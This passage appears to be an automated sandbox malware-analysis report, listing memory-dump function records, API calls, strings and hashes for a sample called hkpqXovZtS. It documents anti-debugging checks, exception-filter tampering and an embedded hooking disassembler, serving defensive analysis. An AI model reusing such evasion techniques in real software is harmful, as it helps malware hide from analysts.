                                                                                                                • Instruction Fuzzy Hash: 15E09A30A00310DAC730DB79B844B02FBE89FA4714B12886FE488E3291D6B8D4818B18
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !ImmediateSize$!X86Instruction->HasDstAddressing$!X86Instruction->HasSelector$!X86Instruction->HasSrcAddressing$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c$OperandIndex < 2$[0x%08I64X] ANOMALY: Unexpected segment override$[0x%08I64X] ANOMALY: unexpected segment 0x%02X
                                                                                                                • API String ID: 0-3094911072
                                                                                                                • Opcode ID: 2b667cbd590bda2a0d174f8c8d876445ada4544e9f01f363cbe83e8078462e9c
                                                                                                                • Instruction ID: 9ff38f791ab0551aa037a07cb369910ba276093d0fa45391b26a0a3623935496
                                                                                                                • Opcode Fuzzy Hash: 2b667cbd590bda2a0d174f8c8d876445ada4544e9f01f363cbe83e8078462e9c
                                                                                                                • Instruction Fuzzy Hash: FE121DB14397429BEB26CF78C8167E7FBE1AF42308F08491DF5DA4629AD3749254CB11
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !X86Instruction->HasDstAddressing$!X86Instruction->HasSelector$!X86Instruction->HasSrcAddressing$!X86Instruction->rex_b$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c$[0x%08I64X] ANOMALY: unexpected segment 0x%02X
                                                                                                                • API String ID: 0-1926436987
                                                                                                                • Opcode ID: 01d3140f92491e51cf157d26f85e740b56e8f00c11b7e9a103eb448657a96025
                                                                                                                • Instruction ID: d3618c4359a9ab054d13fcb2e682296832f1e4b419900e09ea0803f8f0cadab7
                                                                                                                • Opcode Fuzzy Hash: 01d3140f92491e51cf157d26f85e740b56e8f00c11b7e9a103eb448657a96025
                                                                                                                • Instruction Fuzzy Hash: C8C1FCF1479B818BE7228B7484267E3FFD4BF05318F08895CE5EA4A28BD3B59258C751
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00401C5B
                                                                                                                • _strlen.LIBCMT ref: 004021C7
                                                                                                                  • Part of subcall function 00411228: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0040A105,00000000,?,?,?,00000800), ref: 00411244
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharH_prologMultiWide_strlen
                                                                                                                • String ID: lB$lB
                                                                                                                • API String ID: 939850776-3074592483
                                                                                                                • Opcode ID: 51e6539cd6ad76c119b1d84aef5398798daaa018706baafa8eb673dbe9fccf63
                                                                                                                • Instruction ID: da781dcfa3c41042e7f179c7e93926067d03a5c3b1155e994cd270deb5491572
                                                                                                                • Opcode Fuzzy Hash: 51e6539cd6ad76c119b1d84aef5398798daaa018706baafa8eb673dbe9fccf63
                                                                                                                • Instruction Fuzzy Hash: 0D62F131904684CACF15DF64C8897EE7BB0EF55304F08447EE98AAB2D2CB786945CB69
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 022A708A
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 022A7094
                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 022A70A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 3906539128-2496334608
                                                                                                                • Opcode ID: 244ca0cf81f2807dbb8e1fb8c2e9af774aaf715c18808a5d3d5e225fffc2a2a0
                                                                                                                • Instruction ID: 2e64600c29f675d45688f021c07ed73a0cab39485d97754e0844455cef6ed9cd
                                                                                                                • Opcode Fuzzy Hash: 244ca0cf81f2807dbb8e1fb8c2e9af774aaf715c18808a5d3d5e225fffc2a2a0
                                                                                                                • Instruction Fuzzy Hash: F631D475D513199BCB21DF68D98879CBBB8BF08310F5045DAE81CA7250EB709B818F55
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0229FCA8
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0229FD74
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0229FD94
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0229FD9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                • String ID:
                                                                                                                • API String ID: 254469556-0
                                                                                                                • Opcode ID: f390117d259f5a487fa1d28411c221687109377fa8fa1cb1cbcb6ab188abf453
                                                                                                                • Instruction ID: e8fb9946f59ceab7dda370cc3a97c2d23e580be56175bfb9b1e2685f9e11b3a3
                                                                                                                • Opcode Fuzzy Hash: f390117d259f5a487fa1d28411c221687109377fa8fa1cb1cbcb6ab188abf453
                                                                                                                • Instruction Fuzzy Hash: 4F310275D51318DBDF21DFA4E989BCCBBB8BF08304F1045AAE408AB244EB709A848F54
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,022A5BE8,022E4FE0,0000003F,?,022E4FE0,?,022A15AA), ref: 022A5C0B
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,022A5BE8,022E4FE0,0000003F,?,022E4FE0,?,022A15AA), ref: 022A5C12
                                                                                                                • ExitProcess.KERNEL32 ref: 022A5C24
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 0d3f369b0560f7df003464f0caaa9b623bb057df2806786d92be2979b0f7fbfb
                                                                                                                • Instruction ID: 8931d097c2106e779669784c05f34bd3e2bef068e91f1620f425028c83bce55d
                                                                                                                • Opcode Fuzzy Hash: 0d3f369b0560f7df003464f0caaa9b623bb057df2806786d92be2979b0f7fbfb
                                                                                                                • Instruction Fuzzy Hash: 2BE04F31C64104BFCB12AF94E91C94D3B6AFF14341B400814F8088A524CB35E9A5CB80
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _realloc
                                                                                                                • String ID: lB
                                                                                                                • API String ID: 1750794848-323450203
                                                                                                                • Opcode ID: 1b38b0be6cdb36ee81c8732530f228ad12b858b4070a5ecb8b0d261261b6c79c
                                                                                                                • Instruction ID: a5bf126ac02e8c0db7642b2bc99c0050375498717efd55f9e93addb7aaa72c34
                                                                                                                • Opcode Fuzzy Hash: 1b38b0be6cdb36ee81c8732530f228ad12b858b4070a5ecb8b0d261261b6c79c
                                                                                                                • Instruction Fuzzy Hash: F312A1B1A006069BCB29CF24C5916F9B7E1FF85304F24852ED55BCBA84D738E9D1CB49
                                                                                                                Strings
                                                                                                                • kL, xrefs: 022A41B4
                                                                                                                • D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022A42C6
                                                                                                                • 0, xrefs: 022A433C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c$kL
                                                                                                                • API String ID: 0-2726477203
                                                                                                                • Opcode ID: c1524491431fc221099ce72ad76449aabe9dda0db322fa5db00bfeccfc0ce00b
                                                                                                                • Instruction ID: fa9d549f00ad7b792b8521d0eb534232b4d8ce439371e4c2c6e20c7e8292f8a6
                                                                                                                • Opcode Fuzzy Hash: c1524491431fc221099ce72ad76449aabe9dda0db322fa5db00bfeccfc0ce00b
                                                                                                                • Instruction Fuzzy Hash: B561377063030A97DB38FAE89570BBEB3A5AB81708F54052AD842DFE8CD7E1E945C741
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 0-2496334608
                                                                                                                • Opcode ID: 098127059bcfa53212e9fa0e415b1a399626880c3bd24948838697630d283ef0
                                                                                                                • Instruction ID: 9868d51931fbc23f76552a88946820f81f0ca51fbf849abe90cb03d729c3dc3d
                                                                                                                • Opcode Fuzzy Hash: 098127059bcfa53212e9fa0e415b1a399626880c3bd24948838697630d283ef0
                                                                                                                • Instruction Fuzzy Hash: 7D41C1B1C14219AFDB24DFA9CC99AAABBB9EF45304F1442D9E41CD3214DA319E84CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85da51b138ba792ec13a10f672c2d26e299b350a798bdebbfdd76a98c3e546cf
                                                                                                                • Instruction ID: ded02d05ce4494ef59c363e7554f4126acf996b27e6c842f12d86a996ebdb5f9
                                                                                                                • Opcode Fuzzy Hash: 85da51b138ba792ec13a10f672c2d26e299b350a798bdebbfdd76a98c3e546cf
                                                                                                                • Instruction Fuzzy Hash: 35F14F71E112199FDF18CFA9D8906EDB7B1FF48714F158269D819ABB44D730AA01CF90
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 004D0FAB
                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 004D0FB2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                • String ID:
                                                                                                                • API String ID: 3244773808-0
                                                                                                                • Opcode ID: f0da53dde7f9d49de36d188e60cd7c83b30466b84411e445b94999bb36e85478
                                                                                                                • Instruction ID: 4db9a21c669d5ad2b10ed07c6c3810ba5d080f6429e28e87e2e44eb0b7892e25
                                                                                                                • Opcode Fuzzy Hash: f0da53dde7f9d49de36d188e60cd7c83b30466b84411e445b94999bb36e85478
                                                                                                                • Instruction Fuzzy Hash: ABE01270909208EBDB20CBE5D85D79A77AC9B04302F20456FA404C3254DBB9CA54D75E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0$kL
                                                                                                                • API String ID: 0-2777542040
                                                                                                                • Opcode ID: 74b82b60336ffff069e56ff7eb876d4efeb5c51c26b8cfcb5d66edab4940c6c1
                                                                                                                • Instruction ID: 9f6646a4c2d81179960f3b720c16416aa4698f4b3b0812d7efd0838775d7301d
                                                                                                                • Opcode Fuzzy Hash: 74b82b60336ffff069e56ff7eb876d4efeb5c51c26b8cfcb5d66edab4940c6c1
                                                                                                                • Instruction Fuzzy Hash: 38616870A3074797CB38FAE888B07BEA396AB91B08F44091ED542DBE8CD7E0D945C755
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102423945-0
                                                                                                                • Opcode ID: 03f3dc45a7d481ee766d2c504b6e2acbc0f63000ebeb9ed0f4255058e1e786b6
                                                                                                                • Instruction ID: adab659f13cac0ec583eed1968438829ac5a4d0fc0857ce7e58d59b274625805
                                                                                                                • Opcode Fuzzy Hash: 03f3dc45a7d481ee766d2c504b6e2acbc0f63000ebeb9ed0f4255058e1e786b6
                                                                                                                • Instruction Fuzzy Hash: 43F1A1B1D002599FCF14CF68C8916EEBBB4FF44355F14816BE855AB382D3389A81CB98
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,022B2001,?,?,00000008,?,?,022B1C99,00000000), ref: 022B2233
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: 3f5eb18b2d85bba25b829200e4fb4c100906eaac40e15ae8dcd48310dc52556d
                                                                                                                • Instruction ID: 0eb2c7e4028cdf27241e71ab0edaeb79b9a5692376904bc4914a87dcbc19bf60
                                                                                                                • Opcode Fuzzy Hash: 3f5eb18b2d85bba25b829200e4fb4c100906eaac40e15ae8dcd48310dc52556d
                                                                                                                • Instruction Fuzzy Hash: 82B17D31630705CFD71ACF68C486BA57BA0FF453A4F158658E999CF2AAC375E982CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102423945-0
                                                                                                                • Opcode ID: cf22f7b8d02a5ff97bdc6fd6c11410ef8828bc4388737f7604bc3fe7212f0d81
                                                                                                                • Instruction ID: 3593f78325c96443ecff7473da8e87a94a75de6c502b7fdd235fbb49b2d7dc69
                                                                                                                • Opcode Fuzzy Hash: cf22f7b8d02a5ff97bdc6fd6c11410ef8828bc4388737f7604bc3fe7212f0d81
                                                                                                                • Instruction Fuzzy Hash: C0A1F171600208EBDB05DF99C991BED77B5EB40305F1044BFE946EB282CB389B86DB59
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?), ref: 004D0F8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 1347740429-0
                                                                                                                • Opcode ID: 2bd34fda0593ef26a19619360cda7a2addfae50d95690c90c220bc197490b5d7
                                                                                                                • Instruction ID: 4f27cc6ac94c04fe4eebc890230a8e62eccc08e8969edafa2975d96968129942
                                                                                                                • Opcode Fuzzy Hash: 2bd34fda0593ef26a19619360cda7a2addfae50d95690c90c220bc197490b5d7
                                                                                                                • Instruction Fuzzy Hash: 34114832909315AF8B12DF59C64144AF3E9FEC4B18F41881EA68867215D7B0B915EBD2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 0-4203073231
                                                                                                                • Opcode ID: 20c8bd10713e73a812f0177f0310c887ebc6c232f8862c0b4f48425d968ee2f9
                                                                                                                • Instruction ID: bc34883bf00744afcba2bd19ff09e97cfbdc4354a8950d3487e5274b487793fa
                                                                                                                • Opcode Fuzzy Hash: 20c8bd10713e73a812f0177f0310c887ebc6c232f8862c0b4f48425d968ee2f9
                                                                                                                • Instruction Fuzzy Hash: E6C138B2D002289BDF44CF9AD8805DEF7F6BFC8310F6AC1A6D85177615D6346A428F94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: f3b4b2488f11c90cd24aab2b9c4e8e85237e00ea808a37aa13533a2579dd1ef3
                                                                                                                • Instruction ID: 443eee81bea15ad18e5c0365c2804c26a428c2640f7924afa100a6f7e304ced8
                                                                                                                • Opcode Fuzzy Hash: f3b4b2488f11c90cd24aab2b9c4e8e85237e00ea808a37aa13533a2579dd1ef3
                                                                                                                • Instruction Fuzzy Hash: D2519C3063474A9BDB3CE9E848B67BEA7AA9B0130CF04055ED842D7E8CDBD1D949D701
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: ed5d3e028b8efec57c7d5c6908b23294221afbf1ecad3f160e22fe78c8499747
                                                                                                                • Instruction ID: b010e86f339c97c0909dcff01b31e618351584073b25c271cf7872358a25d71c
                                                                                                                • Opcode Fuzzy Hash: ed5d3e028b8efec57c7d5c6908b23294221afbf1ecad3f160e22fe78c8499747
                                                                                                                • Instruction Fuzzy Hash: 7C513A20630B4AE7DB38D9E886B97BEA79B9F02308F0405DAF542DBE8DC791D944C651
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %]@
                                                                                                                • API String ID: 0-3325662880
                                                                                                                • Opcode ID: 1bddb50e526235baf14427a3c7905fb20f5bbecf8889db22e38ba749b0aeb4a3
                                                                                                                • Instruction ID: 121039eeda9cd325f4e6b0212fc433dcaa640b4400819cef4be2381f5d7539a8
                                                                                                                • Opcode Fuzzy Hash: 1bddb50e526235baf14427a3c7905fb20f5bbecf8889db22e38ba749b0aeb4a3
                                                                                                                • Instruction Fuzzy Hash: 4251E130904185ABDB05CFA4D0D05EDBFF0EF5A325F6941EFD8817B282C2356A86CB95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
